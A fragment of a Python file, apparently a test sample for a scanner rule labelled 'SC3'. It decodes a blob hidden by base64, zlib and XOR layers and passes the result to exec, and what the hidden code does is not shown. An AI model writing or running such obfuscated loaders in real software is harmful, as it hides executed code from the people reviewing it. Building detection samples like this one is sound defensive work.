7zvj4QXaBnk0+1A9cfnwwTS9TifT+bHP7xW3YGRka8WbUZpURMhTljOyiTA9zTmPzwXZLwBche91wofXN//T/+dz+l99cZ6Epebc1Npt+ehT0mVCSBEe3wuQ+UnqqUDxfxWz8lbBiVB9djXjLR24hL8u4T5VbC12In5K9ffwBYf4O3"
_K = bytes.fromhex("a1aa552c2e3c3d9e23680b52")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
